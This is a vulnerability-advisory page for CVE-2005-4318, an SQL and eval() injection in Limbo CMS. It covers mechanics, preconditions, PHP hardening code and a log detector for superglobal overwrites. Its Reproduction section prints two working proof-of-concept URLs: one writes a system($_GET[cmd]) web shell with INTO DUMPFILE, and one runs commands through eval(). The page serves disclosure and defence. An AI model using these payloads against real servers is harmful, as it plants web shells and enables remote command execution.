VYPR
Unrated severity · NVD Advisory · Published Dec 17, 2005 · Updated Jun 16, 2026

CVE-2005-4318


Description

SQL injection vulnerability in index.php in Limbo CMS 1.0.4.2 and earlier, with register_globals off, allows remote attackers to execute arbitrary SQL commands via the _SERVER[REMOTE_ADDR] parameter, which modifies the underlying $_SERVER variable.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Affected products: 1

Patches

Vulnerability mechanics

Root cause

"Missing input validation allows user-supplied query parameters to overwrite the $_SERVER superglobal array, and the unsanitized $_SERVER[REMOTE_ADDR] value is used in SQL queries and eval() calls."

Attack vector

An attacker sends an HTTP request to the Limbo CMS `index.php` or `index2.php` with query parameters `_SERVER[]` and `_SERVER[REMOTE_ADDR]` set to a malicious payload. Because `register_globals` is off, PHP allows the attacker to overwrite the `$_SERVER` superglobal array via the query string. The injected `_SERVER[REMOTE_ADDR]` value is not sanitized before being used in a SQL query, enabling blind SQL injection [ref_id=1]. The researcher demonstrates that this works regardless of `magic_quotes_gpc` settings because the `strip_magic_quotes()` function in `includes/initglobal.php` only processes `$_GET` and `$_POST`, not `$_SERVER` [ref_id=1]. The attack requires no authentication and only needs network access to the target web server.

Affected code

The vulnerability lies in how Limbo CMS handles the `$_SERVER` superglobal array. The file `includes/initglobal.php` strips magic quotes from `$_GET` and `$_POST` but does not protect the `$_SERVER` array from being overwritten via query string parameters like `_SERVER[]` and `_SERVER[REMOTE_ADDR]`. The unsanitized `$_SERVER[REMOTE_ADDR]` value is then used directly in SQL queries (e.g., in the simple stats module) and in an `eval()` call within `classes/adodbt/read_table.php` at lines 136-140 [ref_id=1].

What the fix does

No patch is included in the bundle. The advisory [ref_id=1] does not describe a vendor-supplied fix. Based on the root cause, remediation would require preventing user-supplied input from overwriting the `$_SERVER` superglobal array, and sanitizing or validating any `$_SERVER` values (such as `REMOTE_ADDR`) before using them in SQL queries or `eval()` calls. The advisory notes that the `strip_magic_quotes()` function in `includes/initglobal.php` only handles `$_GET` and `$_POST`, leaving `$_SERVER` unprotected; a complete fix would need to either block `_SERVER[]` from being accepted as a query parameter or add proper input validation for all `$_SERVER` values used in sensitive operations.
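As an added illustration of the remediation described above (example code written for this page, not Limbo's own code and not a vendor patch), the snippet below shows the two controls together: request variables are imported into a plain array while any key that names a PHP superglobal is refused, and `REMOTE_ADDR` is validated as an IP address before being bound as a parameter in the stats query. The function names, the `PDO` connection and the `ip`/`visited_at` column names are assumptions; only the `lm_simple_stats` table name comes from the advisory.

```php
<?php
// Added example (not Limbo's own code): a hardened replacement for a
// register_globals-style import of request variables, plus safe use of
// REMOTE_ADDR in a stats query. Function names and the ip/visited_at
// columns are assumptions; lm_simple_stats is the table named in the advisory.

declare(strict_types=1);

// Names that must never be populated from request input.
const RESERVED_GLOBALS = [
    'GLOBALS', '_SERVER', '_GET', '_POST', '_COOKIE', '_FILES',
    '_ENV', '_REQUEST', '_SESSION', 'HTTP_SERVER_VARS', 'HTTP_GET_VARS',
    'HTTP_POST_VARS', 'HTTP_COOKIE_VARS', 'HTTP_ENV_VARS', 'HTTP_SESSION_VARS',
];

/**
 * Import request variables into a plain array (never into global scope),
 * dropping any key that names a superglobal or is not a plain identifier.
 * Returns [accepted, rejectedKeyNames] so callers can log rejections.
 */
function importRequestVars(array $request): array
{
    $accepted = [];
    $rejected = [];
    foreach ($request as $key => $value) {
        if (!is_string($key)
            || in_array($key, RESERVED_GLOBALS, true)
            || !preg_match('/^[A-Za-z_][A-Za-z0-9_]*$/', $key)) {
            $rejected[] = (string) $key;
            continue;
        }
        $accepted[$key] = $value;
    }
    return [$accepted, $rejected];
}

/**
 * Return the client address only if it is a syntactically valid IPv4/IPv6
 * address; anything else is treated as missing rather than passed onward.
 */
function clientIp(array $server): ?string
{
    $raw = $server['REMOTE_ADDR'] ?? null;
    if (!is_string($raw)) {
        return null;
    }
    return filter_var($raw, FILTER_VALIDATE_IP) === false ? null : $raw;
}

/**
 * Record a visit with a prepared statement so the address is bound as data
 * and never interpolated into the SQL text. $db is an open PDO connection
 * to the MySQL database (assumed to exist).
 */
function recordVisit(PDO $db, array $server): bool
{
    $ip = clientIp($server);
    if ($ip === null) {
        return false; // refuse to record rather than query with a bad value
    }
    $stmt = $db->prepare(
        'INSERT INTO lm_simple_stats (ip, visited_at) VALUES (:ip, NOW())'
    );
    return $stmt->execute([':ip' => $ip]);
}

// Constructed request mimicking the shape in the advisory: the _SERVER key is
// rejected by the importer and the real $_SERVER array is never touched.
$constructedQuery = [
    '_SERVER' => ['REMOTE_ADDR' => "999' UNION SELECT ..."],
    'option'  => 'weblinks',
    'Itemid'  => '999',
];
[$vars, $rejectedKeys] = importRequestVars($constructedQuery);
echo 'accepted: ', implode(',', array_keys($vars)), PHP_EOL;
echo 'rejected: ', implode(',', $rejectedKeys), PHP_EOL;
var_dump(clientIp(['REMOTE_ADDR' => '203.0.113.7']));
var_dump(clientIp(['REMOTE_ADDR' => "'.system(...).'"]));
```

The importer returns an array instead of writing into global scope, which removes the overwrite path entirely; the IP validation covers the remaining case where `$_SERVER['REMOTE_ADDR']` is set by a misconfigured proxy or front end rather than by the request itself.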

Preconditions

  • config: PHP register_globals must be Off
  • config: Limbo CMS must be configured to use MySQL for data storage (not flat files)
  • network: Attacker must have network access to the target web server
  • auth: No authentication required

Reproduction

The following proof-of-concept URL demonstrates blind SQL injection via `_SERVER[REMOTE_ADDR]` overwrite [ref_id=1]:

```
http://[target]/[path]/index.php?_SERVER[]&_SERVER[REMOTE_ADDR]=999'UNION SELECT null,'<?php system($_G','ET[cmd]);?>' INTO DUMPFILE '[full_application_path]shell.php' FROM lm_simple_stats/*&option=weblinks&Itemid=999/*
```

For remote command execution via `eval()` injection, the researcher provides this URL [ref_id=1]:

```
http://[target]/[path_to_limbo]/index2.php?cmd=dir&_SERVER[]=&_SERVER[REMOTE_ADDR]='.system($_GET[cmd]).die('').'&option=wrapper&module[module]=1
```

A full PHP exploit script is included in the reference write-up [ref_id=1] that automates the attack through an HTTP request with the crafted `_SERVER[]` and `_SERVER[REMOTE_ADDR]` parameters.
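For detection, the following is an added example (not part of the advisory or its referenced write-up) that scans Apache combined-format access-log lines for query strings attempting to set a PHP superglobal such as `_SERVER`, which is the shape of the requests shown above. The log lines, client addresses and paths are constructed for illustration; the check decodes percent-encoding first so an encoded `%5FSERVER%5B...` key is caught as well.

```php
<?php
// Added example (not from the advisory): flag access-log lines whose query
// string tries to set a PHP superglobal. Sample log lines are constructed.

declare(strict_types=1);

const SUPERGLOBAL_KEYS = [
    'GLOBALS', '_SERVER', '_GET', '_POST', '_COOKIE',
    '_FILES', '_ENV', '_REQUEST', '_SESSION',
];

/**
 * Return the superglobal names a request line ("GET /path?query HTTP/1.1")
 * attempts to set through its query string, or [] if none.
 */
function superglobalKeysInRequest(string $requestLine): array
{
    $parts = explode(' ', $requestLine, 3);
    $url = $parts[1] ?? '';
    $qpos = strpos($url, '?');
    if ($qpos === false) {
        return [];
    }
    $params = [];
    // parse_str percent-decodes names and folds "_SERVER[REMOTE_ADDR]" into
    // the top-level key "_SERVER", which is exactly what PHP would do.
    parse_str(substr($url, $qpos + 1), $params);
    $hits = [];
    foreach (array_keys($params) as $name) {
        if (in_array((string) $name, SUPERGLOBAL_KEYS, true)) {
            $hits[] = (string) $name;
        }
    }
    return $hits;
}

/**
 * Parse combined-format lines and return the suspicious ones with the
 * client address, timestamp and offending key names.
 */
function scanAccessLog(array $lines): array
{
    $findings = [];
    foreach ($lines as $line) {
        if (!preg_match('/^(\S+) \S+ \S+ \[([^\]]+)\] "([^"]*)"/', $line, $m)) {
            continue; // not a combined-format line; skip
        }
        $keys = superglobalKeysInRequest($m[3]);
        if ($keys !== []) {
            $findings[] = ['client' => $m[1], 'time' => $m[2], 'keys' => $keys];
        }
    }
    return $findings;
}

// Constructed sample log: one benign request, one plain attempt, one encoded.
$constructedLog = [
    '198.51.100.5 - - [17/Dec/2005:10:00:01 +0000] "GET /limbo/index.php?option=weblinks&Itemid=1 HTTP/1.1" 200 512',
    '198.51.100.9 - - [17/Dec/2005:10:00:07 +0000] "GET /limbo/index.php?_SERVER[]&_SERVER[REMOTE_ADDR]=x&option=weblinks HTTP/1.1" 200 512',
    '198.51.100.9 - - [17/Dec/2005:10:00:09 +0000] "GET /limbo/index2.php?%5FSERVER%5BREMOTE%5FADDR%5D=y&option=wrapper HTTP/1.1" 200 512',
];

foreach (scanAccessLog($constructedLog) as $f) {
    printf("%s %s attempted to set %s\n", $f['time'], $f['client'], implode(',', $f['keys']));
}
```

Run it with `php scan.php` against real log lines by replacing `$constructedLog` with `file('access.log', FILE_IGNORE_NEW_LINES)`; a legitimate application never needs a request parameter named after a superglobal, so any hit is worth investigating rather than tuning out.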

Generated on May 26, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References: 8
